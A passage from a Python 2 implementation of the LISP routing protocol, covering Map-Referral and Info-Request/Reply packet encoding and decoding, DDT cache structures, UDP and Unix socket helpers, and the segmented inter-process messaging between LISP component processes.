# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17,
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
